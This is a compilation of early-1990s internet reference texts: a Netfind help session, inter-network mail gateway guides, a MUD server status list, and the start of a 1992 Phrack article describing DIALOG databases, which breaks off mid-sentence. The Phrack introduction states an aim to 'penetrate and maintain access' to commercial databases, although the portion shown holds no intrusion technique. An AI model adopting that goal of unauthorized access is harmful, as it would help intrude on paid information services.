SunOS UNIX (bruno)


login: netfind

=====================================================
Welcome to the University of Colorado Netfind server.
=====================================================

I think that your terminal can display 24 lines.


If this is wrong, please enter the "Other" menu and
set the correct number of lines.

Help/Search/Other/Quit [h/s/o/q]: h

Given the name of a person on the Internet and a rough description of where
the person works, Netfind attempts to locate information about the person.
When prompted, enter a name followed by a set of keywords, such as

schwartz university colorado boulder

The name can be a first, last, or login name. The keys describe where the
person works, by the name of the institution and/or the city/state/country.

If you know the institution's domain name (e.g., "cs.colorado.edu", where there
are host names like "brazil.cs.colorado.edu") you can specify it as keys
without the dots (e.g., "cs colorado edu"). Keys are case insensitive and may
be specified in any order. Using more than one key implies the logical AND of
the keys. Specifying too many keys may cause searches to fail. If this
happens, try specifying fewer keys, e.g.,

schwartz boulder

If you specify keys that match many domains, Netfind will list some of the
matching domains/organizations and ask you to form a more specific search.
Note that you can use any of the words in the organization strings (in addition
to the domain components) as keys in future searches.

Organization lines are gathered from imperfect sources. However, it is usually


easy to tell when they are incorrect or not fully descriptive. Even if the
organization line is incorrect/vague, the domain name listed will still work
properly for searches. Often you can "guess" the proper domain.

For example, "cs.<whatever>.edu" is usually the computer science department at


a university, even if the organization line doesn't make this clear.

When Netfind runs, it displays a trace of the parallel search progress, along
with the results of the searches. Since output can scroll by quickly, you
might want to run it in a window system, or pipe the output through tee(1):

rlogin <this server name> -l netfind |& tee log

You can also disable trace output from the "Other" menu.

You can get the Netfind software by anonymous FTP from ftp.cs.colorado.edu,
in pub/cs/distribs/netfind. More complete documentation is also available
in that package. A paper describing the methodology is available in
pub/cs/techreports/schwartz/RD.Papers/PostScript/White.Pages.ps.Z
(compressed PostScript) or
pub/cs/techreports/schwartz/RD.Papers/ASCII/White.Pages.txt.Z (compressed
ASCII).
Please send comments/questions to schwartz@cs.colorado.edu. If you would like
to be added to the netfind-users list (for software updates and other
discussions, etc.), send mail to:

netfind-users-request@cs.colorado.edu.

Help/Search/Other/Quit [h/s/o/q]: q

Exiting Netfind server...

Connection closed by foreign host.


_______________________________________________________________________________

Commercial Networks Reachable From The Internet


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Roman Kanala (kanala@sc2a.unige.ch), CUEPE, University of Geneva

1. Internet to X.400
====================

An X.400 address in form

First name : Fffff


Surname : Nnnnn
Organization : Ooooo
ADMD : Aaaaa
Country : Cc

looks in RFC822 (Internet) addressing like

/G=Fffff/S=Nnnnn/O=Ooooo/@Aaaa.Cc
or
in%"/G=Fffff/S=Nnnnn/O=Ooooo/@Aaaa.Cc"

2. Any X.400 to Internet


========================

My Internet address

kanala@sc2a.unige.ch

can be written for X.400 services (like arCom400 in Switzerland,


Sprint MAIL or MCI Mail in the USA) as follows:

C=CH; ADMD=ARCOM; PRMD=SWITCH; O=UNIGE; OU=SC2A; S=KANALA

and in Internet RFC822 form (althrough I don't see any reason to do it


this way for sending messages from Internet to Internet):

/S=Kanala/OU=sc2a/O=UniGe/P=Switch/@arcom.ch

3. MCI Mail to Internet (via a gateway)


=======================
If you are in the USA and using MCI Mail, then you can write to Internet
addresses as follows:

TO: Roman Kanala (EMS)


EMS: INTERNET
MBX: kanala@sc2a.unige.ch

The gateway from MCI Mail to Internet is accessed by referencing the user's
name as though he were on an EMS service. When EMS name of INTERNET is used
for example, in the USA, then it's in order to have NRI (Reston VA) handle the
message for him. When prompted for mailbox MBX, user enters the Internet
address he is wanting to send a message to.

4. Internet to MCI Mail


=======================

The general address form is username@mcimail.com, where the username is in one


of two forms: either full username or the numerical box number in form of
digits only and preceded by three zeros, for ex. 0001234567@mcimail.com
(address 1234567 is ficticious).

5. AppleLink to Internet or Bitnet


==================================

Internet address is used with a suffix @INTERNET#, like

kanala@sc2a.unige.ch@internet#
or kanala@cgeuge52.bitnet@internet#

(here cgeuge52 is the bitnet address of sc2a.unige.ch)

6. Internet or Bitnet to AppleLink


==================================

AppleLink address is used as if it were an Internet username on the


AppleLink.Apple.Com node, like:

CH0389@applelink.apple.com

7. CompuServe to Internet
=========================

In the address field from CompuServe, type the symbol >, "greater than", the
word "INTERNET" in uppercase characters, then a space followed by the Internet
address, like:

>INTERNET kanala@sc2a.unige.ch

8. Internet to CompuServe
=========================

The CompuServe address is used followed by "@compuserve.com". In the


CompuServe mailbox number the comma is replaces by a period, example:
12345.678@compuserve.com (address 12345.678 is ficticious)
_______________________________________________________________________________

Inter-Network Mail Guide


~~~~~~~~~~~~~~~~~~~~~~~~
This document is Copyright 1990 by John J. Chew. All rights reserved.
Permission for non-commercial distribution is hereby granted, provided
that this file is distributed intact, including this copyright notice
and the version information above. Permission for commercial
distribution can be obtained by contacting the author as described
below.

INTRODUCTION

This file documents methods of sending mail from one network to another. It
represents the aggregate knowledge of the readers of comp.mail.misc and many
contributors elsewhere. If you know of any corrections or additions to this
file, please read the file format documentation below and then mail to me:

John J. Chew <poslfit@gpu.utcs.utoronto.ca>

DISTRIBUTION

(news) This list is posted monthly to Usenet newsgroups comp.mail.misc and


news.newusers.questions.
(mail) I maintain a growing list of subscribers who receive each monthly
issue by electronic mail, and recommend this to anyone planning to
redistribute the list on a regular basis.
(FTP) Internet users can fetch this guide by anonymous FTP as ~ftp/pub/docs/
internetwork-mail-guide on Ra.MsState.Edu (130.18.80.10 or 130.18.96.37)
[Courtesy of Frank W. Peters]
(Listserv) Bitnet users can fetch this guide from the Listserv at UNMVM.
Send mail to LISTSERV@UNMVM with blank subject and body consisting of
the line "GET NETWORK GUIDE". [Courtesy of Art St. George]

HOW TO USE THIS GUIDE

Each entry in this file describes how to get from one network to another. To
keep this file at a reasonable size, methods that can be generated by
transitivity (A->B and B->C gives A->B->C) are omitted. Entries are sorted
first by source network and then by destination network. This is what a
typical entry looks like:

#F mynet
#T yournet
#R youraddress
#C contact address if any
#I send to "youraddress@thegateway"

For parsing purposes, entries are separated by at least one blank line, and
each line of an entry begins with a "#" followed by a letter. Lines beginning
with "#" are comments and need not be parsed. Lines which do not start with a
"#" at all should be ignored as they are probably mail or news headers.

#F (from) and #T (to) lines specify source and destination networks. If you're
sending me information about a new network, please give me a brief description
of the network so that I can add it to the list below. The abbreviated network
names used in #F and #T lines should consist only of the characters a-z, 0-9
and "-" unless someone can make a very convincing case for their favourite pi
character.

These are the currently known networks with abbreviated names:

applelink AppleLink (Apple Computer, Inc.'s in-house network)


bitnet international academic network
bix Byte Information eXchange: Byte magazine's commercial BBS
bmug Berkeley Macintosh Users Group
compuserve commercial time-sharing service
connect Connect Professional Information Network (commercial)
easynet Easynet (DEC's in-house mail system)
envoy Envoy-100 (Canadian commercial mail service)
fax Facsimile document transmission
fidonet PC-based BBS network
geonet GeoNet Mailbox Systems (commercial)
internet the Internet
mci MCI's commercial electronic mail service
mfenet Magnetic Fusion Energy Network
nasamail NASA internal electronic mail
peacenet non-profit mail service
sinet Schlumberger Information NETwork
span Space Physics Analysis Network (includes HEPnet)
sprintmail Sprint's commercial mail service (formerly Telemail)
thenet Texas Higher Education Network

#R (recipient) gives an example of an address on the destination network, to


make it clear in subsequent lines what text requires subsitution.

#C (contact) gives an address for inquiries concerning the gateway, expressed


as an address reachable from the source (#F) network. Presumably, if you can't
get the gateway to work at all, then knowing an unreachable address on another
network will not be of great help.

#I (instructions) lines, of which there may be several, give verbal


instructions to a user of the source network to let them send mail to a user on
the destination network. Text that needs to be typed will appear in double
quotes, with C-style escapes if necessary.

#F applelink
#T internet
#R user@domain
#I send to "user@domain@internet#"
#I domain can be be of the form "site.bitnet", address must be <35
characters

#F bitnet
#T internet
#R user@domain
#I Methods for sending mail from Bitnet to the Internet vary depending on
#I what mail software is running at the Bitnet site in question. In the
#I best case, users should simply be able to send mail to "user@domain".
#I If this doesn't work, try "user%domain@gateway" where "gateway" is a
#I regional Bitnet-Internet gateway site. Finally, if neither of these
#I works, you may have to try hand-coding an SMTP envelope for your mail.
#I If you have questions concerning this rather terse note, please try
#I contacting your local postmaster or system administrator first before
#I you send me mail -- John Chew <poslfit@gpu.utcs.utoronto.ca>

#F compuserve
#T fax
#R +1 415 555 1212
#I send to "FAX 14155551212" (only to U.S.A.)

#F compuserve
#T internet
#R user@domain
#I send to ">INTERNET:user@domain"

#F compuserve
#T mci
#R 123-4567
#I send to ">MCIMAIL:123-4567"

#F connect
#T internet
#R user@domain
#I send to CONNECT id "DASNET"
#I first line of message: "\"user@domain\"@DASNET"

#F easynet
#T bitnet
#R user@site
#C DECWRL::ADMIN
#I from VMS use NMAIL to send to "nm%DECWRL::\"user@site.bitnet\""
#I from Ultrix
#I send to "user@site.bitnet" or if that fails
#I (via IP) send to "\"user%site.bitnet\"@decwrl.dec.com"
#I (via DECNET) send to "DECWRL::\"user@site.bitnet\""

#F easynet
#T fidonet
#R john smith at 1:2/3.4
#C DECWRL::ADMIN
#I from VMS use NMAIL to send to
#I "nm%DECWRL::\"john.smith@p4.f3.n2.z1.fidonet.org\""
#I from Ultrix
#I send to "john.smith@p4.f3.n2.z1.fidonet.org" or if that fails
#I (via IP) send to
\"john.smith%p4.f3.n2.z1.fidonet.org\"@decwrl.dec.com"
#I (via DECNET) send to "DECWRL::\"john.smith@p4.f3.n2.z1.fidonet.org\""

#F easynet
#T internet
#R user@domain
#C DECWRL::ADMIN
#I from VMS use NMAIL to send to "nm%DECWRL::\"user@domain\""
#I from Ultrix
#I send to "user@domain" or if that fails
#I (via IP) send to "\"user%domain\"@decwrl.dec.com"
#I (via DECNET) send to "DECWRL::\"user@domain\""

#F envoy
#T internet
#R user@domain
#C ICS.TEST or ICS.BOARD
#I send to "[RFC-822=\"user(a)domain\"]INTERNET/TELEMAIL/US
#I for special characters, use @=(a), !=(b), _=(u), any=(three octal digits)

#F fidonet
#T internet
#R user@domain
#I send to "uucp" at nearest gateway site
#I first line of message: "To: user@domain"

#F geonet
#T internet
#R user@domain
#I send to "DASNET"
#I subject line: "user@domain!subject"

#F internet
#T applelink
#R user
#I send to "user@applelink.apple.com"

#F internet
#T bitnet
#R user@site
#I send to "user%site.bitnet@gateway" where "gateway" is a gateway host that
#I is on both the internet and bitnet. Some examples of gateways are:
#I cunyvm.cuny.edu mitvma.mit.edu. Check first to see what local policies
#I are concerning inter-network forwarding.

#F internet
#T bix
#R user
#I send to "user@dcibix.das.net"

#F internet
#T bmug
#R John Smith
#I send to "John.Smith@bmug.fidonet.org"

#F internet
#T compuserve
#R 71234,567
#I send to "71234.567@compuserve.com"
#I note: Compuserve account IDs are pairs of octal numbers. Ordinary
#I consumer CIS user IDs begin with a `7' as shown.

#F internet
#T connect
#R NAME
#I send to "NAME@dcjcon.das.net"

#F internet
#T easynet
#R HOST::USER
#C admin@decwrl.dec.com
#I send to "user@host.enet.dec.com" or "user%host.enet@decwrl.dec.com"
#F internet
#T easynet
#R John Smith @ABC
#C admin@decwrl.dec.com
#I send to "John.Smith@ABC.MTS.DEC.COM"
#I (This syntax is for All-In-1 users.)

#F internet
#T envoy
#R John Smith (ID=userid)
#C /C=CA/ADMD=TELECOM.CANADA/ID=ICS.TEST/S=TEST_GROUP/@nasamail.nasa.gov
#C for second method only
#I send to "uunet.uu.net!att!attmail!mhs!envoy!userid"
#I or to "/C=CA/ADMD=TELECOM.CANADA/DD.ID=userid/PN=John_Smith/@Sprint.COM"

#F internet
#T fidonet
#R john smith at 1:2/3.4
#I send to "john.smith@p4.f3.n2.z1.fidonet.org"

#F internet
#T geonet
#R user at host
#I send to "user:host@map.das.net"
#I American host is geo4, European host is geo1.

#F internet
#T mci
#R John Smith (123-4567)
#I send to "1234567@mcimail.com"
#I or send to "JSMITH@mcimail.com" if "JSMITH" is unique
#I or send to "John_Smith@mcimail.com" if "John Smith" is unique - note the
#I underscore!
#I or send to "John_Smith/1234567@mcimail.com" if "John Smith" is NOT unique

#F internet
#T mfenet
#R user@mfenode
#I send to "user%mfenode.mfenet@nmfecc.arpa"

#F internet
#T nasamail
#R user
#C <postmaster@ames.arc.nasa.gov>
#I send to "user@nasamail.nasa.gov"

#F internet
#T peacenet
#R user
#C <support%cdp@arisia.xerox.com>
#I send to "user%cdp@arisia.xerox.com"

#F internet
#T sinet
#R node::user or node1::node::user
#I send to "user@node.SINet.SLB.COM" or "user%node@node1.SINet.SLB.COM"
#F internet
#T span
#R user@host
#C <NETMGR@nssdca.gsfc.nasa.gov>
#I send to "user@host.span.NASA.gov"
#I or to "user%host.span@ames.arc.nasa.gov"

#F internet
#T sprintmail
#R [userid "John Smith"/organization]system/country
#I send to
/C=country/ADMD=system/O=organization/PN=John_Smith/DD.ID=userid/@Sprint.COM"

#F internet
#T thenet
#R user@host
#I send to "user%host.decnet@utadnx.cc.utexas.edu"

#F mci
#T internet
#R John Smith <user@domain>
#I at the "To:" prompt type "John Smith (EMS)"
#I at the "EMS:" prompt type "internet"
#I at the "Mbx:" prompt type "user@domain"

#F nasamail
#T internet
#R user@domain
#I at the "To:" prompt type "POSTMAN"
#I at the "Subject:" prompt enter the subject of your message
#I at the "Text:" prompt, i.e. as the first line of your message,
#I enter "To: user@domain"

#F sinet
#T internet
#R user@domain
#I send to "M_MAILNOW::M_INTERNET::\"user@domain\""
#I or "M_MAILNOW::M_INTERNET::domain::user"

#F span
#T internet
#R user@domain
#C NETMGR@NSSDCA
#I send to "AMES::\"user@domain\""

#F sprintmail
#T internet
#R user@domain
#I send to "[RFC-822=user(a)domain @GATEWAY]INTERNET/TELEMAIL/US"

#F thenet
#T internet
#R user@domain
#I send to UTADNX::WINS%" user@domain "

_______________________________________________________________________________

MUDs
~~~~
By Frosty of CyberSpace Project

------------------------------------------------------------------------------
MUDWHO servers (5)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
Amber amber.ecst.csuchico.edu 132.241.1.43 6889 up 1
DEC decuac.dec.com 192.5.214.1 6889 up 5
Littlewood littlewood.math.okstate. 139.78.1.13 6889 up 4
edu
Nova nova.tat.physik. 134.2.62.161 6889 up 3
uni-tuebingen.de
PernWHO milo.mit.edu 18.70.0.216 6889 up 2
------------------------------------------------------------------------------
AberMUDs (11)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
Aber5@FSU loligo.cc.fsu.edu 128.186.2.99 5000 R*
DIRT ulrik.uio.no 129.240.2.4 6715 up 32
Dragon messua.informatik. 137.226.224.9 6715 up
rwth-aachen.de
Eddie aber eddie.ee.vt.edu 128.173.5.207 5000 TO
Alles
EnchantedMud neptune.calstatela.edu 130.182.193.1 6715 up 22
Longhorn lisboa.cs.utexas.edu 128.83.139.10 6715 up
Mustang MUD mustang.dell.com 143.166.224.42 6715 up
SpudMud stjoe.cs.uidaho.edu 129.101.128.7 6715 up
Temple bigboy.cis.temple.edu 129.32.32.98 6715 up
The Underground hal.gnu.ai.mit.edu 128.52.46.11 6715 R*
Wolf b.cs.wvu.wvnet.edu 129.71.11.2 6715 R*
------------------------------------------------------------------------------
DikuMUDs (17)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
Albanian judy.indstate.edu 139.102.14.10 4000 R
DikuMUD
AlexMUD alex.stacken.kth.se 130.237.237.3 4000 up
*Alfa Diku alfa.me.chalmers.se 129.16.50.11 4000 up
Austin MUD austin.daimi.aau.dk 130.225.16.161 4000 R 29
Caltech DIKU eltanin.caltech.edu 131.215.139.53 4000 R
Copper Diku copper.denver.colorado. 132.194.10.1 4000 up 33
edu
Davis Diku fajita.ucdavis.edu 128.120.61.203 3000 up 28
DikuMUD I bigboy.cis.temple.edu 129.32.32.98 4000 up
Elof DikuMUD elof.iit.edu 192.41.245.90 4000 up
Epic hal.gnu.ai.mit.edu 128.52.46.11 9000 R
Grimne Diku flipper.pvv.unit.no 129.241.36.200 4000 R
HypeNet ???? 129.10.12.2 4000 TO
Matsci1 Diku matsci1.uncwil.edu 128.109.221.21 4000 up
Mudde hawk.svl.cdc.com 129.179.4.49 4000 up
Pathetique
Sejnet Diku sejnet.sunet.se 192.36.125.3 4000 up
Waterdeep shine.princeton.edu 128.112.120.28 4000 up
Wayne Diku venus.eng.wayne.edu 141.217.24.4 4000 R
------------------------------------------------------------------------------
DUMs (2)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
CanDUM II cheetah.vlsi.waterloo. 129.97.128.253 2001 up
edu
DUM II legolas.cs.umu.se 130.239.88.5 2001 R 23
------------------------------------------------------------------------------
LPmuds (58)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
Aegolius vyonous.kennesaw.edu 130.218.13.19 2000 up
Acadicus
After Hours janice.cc.wwu.edu 140.160.240.28 2000 up 30
Akropolis ???? 139.124.40.4 6666 up
Allinite ???? 134.126.21.223 2222 up
BatMUD palikka.jyu.fi 130.234.0.3 2001 up
*CyberWorld newview.etsu.edu 192.43.199.33 3000 up 34
*Darkemud dunix.drake.edu 192.84.11.2 4040 up 26
Darker Realms worf.tamu.edu 128.194.51.189 2000 up
Dartmouth LPMud lusty.tamu.edu 128.194.10.118 2000 up
Deeper Trouble alk.iesd.auc.dk 130.225.48.46 4242 up
DevMUD huey.cc.utexas.edu 128.83.135.2 9300 R
DiscWorld II peregrin.resmel.bhp.com. 134.18.1.12 2000 up
au
Dragon's Den ???? 129.25.7.111 2222 up
End Of The Line mud.stanford.edu 36.21.0.47 2010 up 35
Finnegan's Wake maxheadroom.agps.lanl. 192.12.184.10 2112 up
gov
Frontier blish.cc.umanitoba.ca 130.179.168.77 9165 up
GateWay secum.cs.dal.ca 129.173.24.31 6969 up
*Genesis milou.cd.chalmers.se 129.16.79.12 2000 up 36
*Igor epsilon.me.chalmers.se 129.16.50.30 1701 up
ImperialMUD aix.rpi.edu 128.113.26.11 2000 up 37
Ivory Tower brown-swiss.macc.wisc. 128.104.30.151 2000 R 27
edu
Kobra duteca4.et.tudelft.nl 130.161.144.22 8888 up
LPSwat aviator.cc.iastate.edu 129.186.140.6 2020 up
Marches of chema.ucsd.edu 132.239.68.1 3000 up
Antan
Middle-Earth oba.dcs.gla.ac.uk 130.209.240.66 3000 up 38
Muddog Mud phaedrus.math.ufl.edu 128.227.168.2 2000 up
Mystic ohm.gmu.edu 129.174.1.33 4000 up
NANVAENT saddle.ccsun.strath.ac. 130.159.208.54 3000 up 24
uk
Nameless complex.is 130.208.165.231 2000 up
Nanny lysator.liu.se 130.236.254.1 2000 up
NeXT ???? 152.13.1.5 2000 up
Nemesis dszenger9.informatik. 131.159.8.67 2000 up
tu-muenchen.de
*Nightfall nova.tat.physik. 134.2.62.161 4242 up
uni-tuebingen.de
Nightmare orlith.bates.edu 134.181.1.12 2666 R
Nirvana 4 elof.iit.edu 192.41.245.90 3500 up
Nuage fifi.univ-lyon1.fr 134.214.100.21 2000 R
*Overdrive im1.lcs.mit.edu 18.52.0.151 5195 up
PaderMUD athene.uni-paderborn.de 131.234.2.32 4242 up
PixieMud elof.iit.edu 192.41.245.90 6969 up
QUOVADIS disun29.epfl.ch 128.178.79.77 2345 up
Realmsmud hammerhead.cs.indiana. 129.79.251.8 2000 up
edu
Ringworld ???? 130.199.96.45 3469 R* 34
Round Table engr71.scu.edu 129.210.16.71 2222 up
Sky Realms maxheadroom.agps.lanl. 192.12.184.10 2000 R*
gov
SmileyMud elof.iit.edu 192.41.245.90 5150 up
StickMUD palikka.jyu.fi 130.234.0.3 7680 up
SvenskMUD lysator.liu.se 130.236.254.1 2043 up 39
*The Mud dogstar.colorado.edu 128.138.248.32 5555 up
Institute
Top Mud lonestar.utsa.edu 129.115.120.1 2001 up
Tsunami II gonzo.cc.wwu.edu 140.160.240.20 2777 R* 20
TubMUD morgen.cs.tu-berlin.de 130.149.19.20 7680 up
Valhalla wiretap.spies.com 130.43.3.3 2444 up
Valkyrie Prime fozzie.cc.wwu.edu 140.160.240.21 2777 up
VikingMUD swix.ifi.unit.no 129.241.163.51 2001 up
Vincent's aviator.cc.iastate.edu 129.186.140.6 1991 up 31
Hollow
World of Mizar delial.docs.uu.se 130.238.8.40 9000 R
------------------------------------------------------------------------------
mage (1)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
SynthMAGE synth.erc.clarkson.edu 128.153.28.35 4242 TO
------------------------------------------------------------------------------
MOOs (1)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
Lambda MOO lambda.parc.xerox.com 13.2.116.36 8888 up
------------------------------------------------------------------------------
TinyMUCKs (12)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
AfterFive pa.itd.com 128.160.2.249 9999 up 31
Burning Metal amber.ecst.csuchico.edu 132.241.1.43 8088 up
Crossroads coyote.cs.wmich.edu 141.218.40.40 5823 R*
FurryMUCK highlandpark.rest.ri.cmu 128.2.254.5 2323 up 8
edu
High Seas opus.calstatela.edu 130.182.111.1 4301 up
Lawries MUD cserve.cs.adfa.oz.au 131.236.20.1 4201 R 7
PythonMUCK zeus.calpoly.edu 129.65.16.21 4201 up 18
QWest glia.biostr.washington. 128.95.10.115 9999 up
edu
Quartz Paradise quartz.rutgers.edu 128.6.60.6 9999 up 40
Time Traveller betz.biostr.washington. 128.95.10.119 4096 up
edu
TinyMUD Classic winner.itd.com 128.160.2.248 2000 R 41
II
Visions l_cae05.icaen.uiowa.edu 128.255.21.25 2001 R 16
------------------------------------------------------------------------------
MUGs (1)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
UglyMUG ???? 130.88.14.17 4201 up
------------------------------------------------------------------------------
TinyMUSEs (5)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
Fantasia betz.biostr.washington. 128.95.10.119 4201 up 13
edu
FantasyMuse case2.cs.usu.edu 129.123.7.19 1701 up 42
MicroMUSE chezmoto.ai.mit.edu 18.43.0.102 4201 up 6
Rhostshyl stealth.cit.cornell.edu 128.253.180.15 4201 up 42
TrekMUSE ecsgate.uncecs.edu 128.109.201.1 1701 R 42
------------------------------------------------------------------------------
TinyMUSHes (15)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
Dungeon ra.info.sunyit.edu 149.15.1.3 8888 up
Global MUSH workstation5.colby.edu 137.146.64.237 4201 up
ImageCastle wizard.etsu.edu 192.43.199.19 4201 up
Narnia nimitz.mit.edu 18.80.0.161 2555 R*
PernMUSH milo.mit.edu 18.70.0.216 4201 up 42
SouthCon utpapa.ph.utexas.edu 128.83.131.52 4201 up 42
Spellbound thumper.cc.utexas.edu 128.83.135.23 4201 up
SqueaMUSH ultimo.socs.uts.edu.au 138.25.8.7 6699 R**
StingMUSH newview.etsu.edu 192.43.199.33 1701 up 42
TinyCWRU caisr2.caisr.cwru.edu 129.22.24.22 4201 R*
TinyHORNS louie.cc.utexas.edu 128.83.135.4 4201 up
TinyTIM II cheetah.ece.clarkson. 128.153.13.54 5440 up
edu
VisionMUSH tramp.cc.utexas.edu 128.83.135.26 4567 TO
------------------------------------------------------------------------------
TeenyMUDs (3)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
ApexMUD apex.yorku.ca 130.63.7.6 4201 up
Evil!MUD fido.econ.arizona.edu 128.196.196.1 4201 up
MetroMUT uokmax.ecn.uoknor.edu 129.15.20.2 5000 R
------------------------------------------------------------------------------
TinyMUDs (2)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
DragonMUD ghost.cse.nau.edu 134.114.64.6 4201 up 14
TinyWORLD rillonia.ssc.gov 143.202.16.13 6250 up
------------------------------------------------------------------------------
UnterMUDs (9)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
ChrisMUD hawkwind.utcs.utoronto. 128.100.102.51 6600 up 10
ca
DECmud decuac.dec.com 192.5.214.1 6565 up 15
DreamScape moebius.math.okstate. 139.78.10.3 6250 up 11
edu
Islandia hawkwind.utcs.utoronto. 128.100.102.51 2323 up
ca
RealWorld cook.brunel.ac.uk 134.83.128.246 4201 up 17
Sludge unix1.cc.ysu.edu 192.55.234.50 6565 up 19
Sunmark moebius.math.okstate. 139.78.10.3 6543 up
edu
WanderLand sun.ca 192.75.19.1 6666 up 9
WireHED amber.ecst.csuchico.edu 132.241.1.43 6565 up 12
------------------------------------------------------------------------------
YAMUDs (1)
Name Address Numeric Address Port Status Notes
------------------------------------------------------------------------------
GooLand toby.cis.uoguelph.ca 131.104.48.112 6715 up
------------------------------------------------------------------------------
Notes
------------------------------------------------------------------------------
Asterisk (*) before the name indicates that this sites entry was modified in
the last 7 days.

Status field:
* = last successful connection was more than 7 days ago
** = last successful connection was more than 30 days ago
# = no successful connection on record
R = connection refused
TO = connection timed out
HD = host down or unreachable
ND = network down or unreachable
NA = insufficient address information available

1. administrator is warlock@ecst.csuchico.edu
2. administrator is jt1o@andrew.cmu.edu
3. administrator is gamesmgr@taurus.tat.physik.uni-tuebingen.de
4. administrator is jds@math.okstate.edu
5. administrator is mjr@decuac.dec.com
6. send mail to micromuse-registration@michael.ai.mit.edu to register
7. send mail to Lawrie.Brown@adfa.oz.au to register
8. send mail to ss7m@andrew.cmu.edu to register
9. send mail to wanderland@lilith.ebay.sun.com to register
10. send mail to cks@hawkwind.utcs.toronto.edu to register
11. send mail to jds@math.okstate.edu to register
12. send mail to warlock@ecst.csuchico.edu to register
13. send mail to fantasia@betz.biostr.washington.edu to register
14. send mail to {jjt,jopsy}@naucse.cse.nau.edu to register
15. send mail to mjr@decuac.dec.com to register
16. send mail to schlake@minos.nmt.edu to register
17. send mail to ee89psw@brunel.ac.uk to register
18. send mail to {awozniak,claudius}@zeus.calpoly.edu to register
19. send mail to mud@cc.ysu.edu to register
20. hours are 0000-1600(M) 0100-1700(TWRF) 0100-2400(S) 0000-2400(U) GMT
21. hours are 1700-0800(MTWRF) 0000-2400(SU) CST
22. hours are 1900-0600(MTWRF) 0000-2400(SU) PDT
23. hours are 1900-0700(MTWRF) 0000-2400(SU)
24. hours are 1700-0900(MTWRF) 0000-2400(SU) GMT
25. hours are 1700-0700(MTWRF) 0000-2400(SU) PST
26. hours are 2100-0900(MTWRF) 0000-2400(SU)
27. hours are 1630-0800(MTWRF) 0000-2400(SU) CST
28. hours are 2000-0800(MTWRF) 0000-2400(S) 0000-1200,1700-2400(U) PST
29. hours are 1800-0800(MTWRF) 0000-2400(SU) CET
30. hours are 1700-0700(MTWRF) 0000-2400(SU) PST
31. hours are 1700-0800(MTWRF) 0000-2400(SU) CST
32. hours are 2000-0800(MTWRF) 0000-2400(SU) CET
33. hours are 1700-0800(MTWRF) 0000-2400(SU) MST
34. down until further notice
35. closed for repairs
36. the original LP; closed to public
37. closed to public
38. closed to players
39. Swedish-language mud
40. no pennies
41. mail agri@pa.itd.com to recover old characters
42. restricted theme
_______________________________________________________________________________

==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 5 of 13

***************************************************************************
* *
* The Complete Guide To *
* The DIALOG Information Network *
* *
* by *
* Brian Oblivion *
* *
* Courtesy of: Restricted-Data-Transmissions (RDT) *
* "Truth Is Cheap, But Information Costs." *
* *
* 5/9/92 *
***************************************************************************

INTRODUCTION:

With the plethora of on-line databases in the public and private sectors,
I feel it is becoming increasingly important to penetrate and maintain access
to these databases. The databases in question contain data pertaining to our
personal lives and to our environment, not to mention the tetrabytes of useful
information that can be directed toward research and personal education.

Who or What is DIALOG?

The DIALOG Information Network is a service that links various public and
commercial databases together for convenience. In the past, when one wanted to
access LEGAL RESOURCE INDEX, for instance, one would have to dial direct. With
DIALOG, hundreds of databases are connected via X.25 networks (Tymnet,
Sprintnet, Uninet, Dialnet) eliminating frustrating searching and outrageous
long distance telephone bills (before the AT&T divestiture).

Further, within this file is a PARTIAL list of databases found on-line.


Some of the databases are nothing more than periodicals and abstract sources,
while others provide FullText articles and books. There are over 2500
periodicals, newspapers, newsletters and newswires on-line in FullText.

Here are a few of my favorites:

McGraw-Hill Publications On-Line (File624)

- Services offer FullText of their Newsletters serving the world-wide


aerospace and defense industry. Complete text from 30 newsletters such as
AeroSpace Daily, BYTE, Aviation Week and Space Technology, Data Communications,
ENR, among others. For more info on the database, when in DIALOG type Help
News624.

PR NEWSWIRE (File613)

- PR Newswire records contain the complete text of news releases prepared


by: companies; public relations agencies; trade associations; city, state,
federal and non-US Government agencies; and other sources covering the entire
spectrum of news. The complete text of a news release typically contains
details or background information that is not published in newspapers. More
than 8500 companies contribute news for PR Newswire. PR NEWSWIRE is a known
agent of Corporate Intelligence.

DMS/FI MARKET INTELLIGENCE REPORTS (File589)

- FullText of World AeroSpace Weekly, covers all aspects of both civil and
military aerospace activities worldwide.
- World Weapons Review, very high degree of technical detail and
perspective. As such, it has special appeal to military professionals
and users of weapons.

Note: The database treats the newsletters as separate Binders. For example,
to access the World Weapons Review, after connecting to the database,
type:

SELECT BN=WORLD WEAPONS REVIEW


or whichever newsletter you wish to search.

FINE CHEMICALS DATABASE (File360)

- The focus of this database is on sources for laboratory, specialty, and


unusual chemicals used in scientific research and new product development.
Fine chemicals are relatively pure chemicals typically produced in small
quantities. The database will provide you with manufacturers and/or
distributors.

DUN'S ELECTRONIC YELLOW PAGES (File515)

- Largest database of U.S. businesses available on DIALOG, providing


information on a total of 8.5 million establishments. Corporate intelligence:
you can quickly verify the existence of a business. Then you can obtain
address, telephone number, employee size, Standard Industrial Classification
(SIC) and other basic information.

CURRENT CONTENTS SEARCH (File440)

- FullText articles from over 8000+ worldwide journals dealing with


science and technology.

BOOKS IN PRINT (File470)

- Access to in-print and out-of-print books since 1979, BIP lets you
retrieve bibliographic data on virtually every book published or distributed in
the United States. Plus FullText reviews on the book(s) you have selected.
See next.

PUBLISHERS DISTRIBUTORS AND WHOLESALERS ON-LINE (File450)

- PDW on-line will locate virtually any book, audio cassette, software
publisher, distributor, or wholesaler in the U.S.

You now should have an idea of the power and scope of the Dialog
Information Network.

NOTE: Most of DIALOG's Services are now available to certain Research


facilities, public and private, on CD-ROM. Check your local public and
